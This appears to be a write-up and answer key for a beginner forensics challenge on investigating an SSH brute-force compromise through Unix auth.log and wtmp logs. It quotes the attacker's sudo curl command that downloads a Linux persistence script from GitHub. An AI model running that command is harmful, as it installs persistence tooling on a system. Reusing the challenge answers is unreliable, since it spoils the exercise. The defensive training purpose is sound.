type
status
date
slug
summary
tags
category
icon
password
Catagory
Materials
Retired
Retired
Due date
Jul 11, 2024 03:04 PM
Status
Belong in

Progress

In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We'll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.
notion image

Task 1

Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?
Ans:65.2.161.68
notion image

Task 2

The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?
Ans:root

Task 3

Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?
Ans:2024-03-06 06:32:45
notion image

Task 4

SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker's session for the user account from Question 2?
Ans:37
notion image

Task 5

The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?
Ans:cyberjunkie
notion image

Task 6

What is the MITRE ATT&CK sub-technique ID used for persistence?
Ans:T1136.001
notion image

Task 7

How long did the attacker's first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)
start time:06:32:44
start time:06:32:44
end time:06:37:24
end time:06:37:24

Task 8

The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?
Ans:/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
notion image

Link to Notes

    Reference

    Hunting for Persistence in Linux (Part 1): Auditd, Sysmon, Osquery (and Webshells)
    An introduction to monitoring and logging in linux to look for persistence.
    Hunting for Persistence in Linux (Part 1): Auditd, Sysmon, Osquery (and Webshells)
    https://pberba.github.io/security/2021/11/22/linux-threat-hunting-for-persistence-sysmon-auditd-webshell/
    Hunting for Persistence in Linux (Part 1): Auditd, Sysmon, Osquery (and Webshells)
    utmp、wtmp、failedlogin 檔案格式
    utmp、wtmp、failedlogin 檔案格式
    https://www.ibm.com/docs/zh-tw/aix/7.3?topic=formats-utmp-wtmp-failedlogin-file-format
    相關文章
    Sharlocks - Litter
    Sharklocks - Meerkat
    Tomcat Takeover Blue Team Lab
    Sharlocks - LitterSharklocks - Meerkat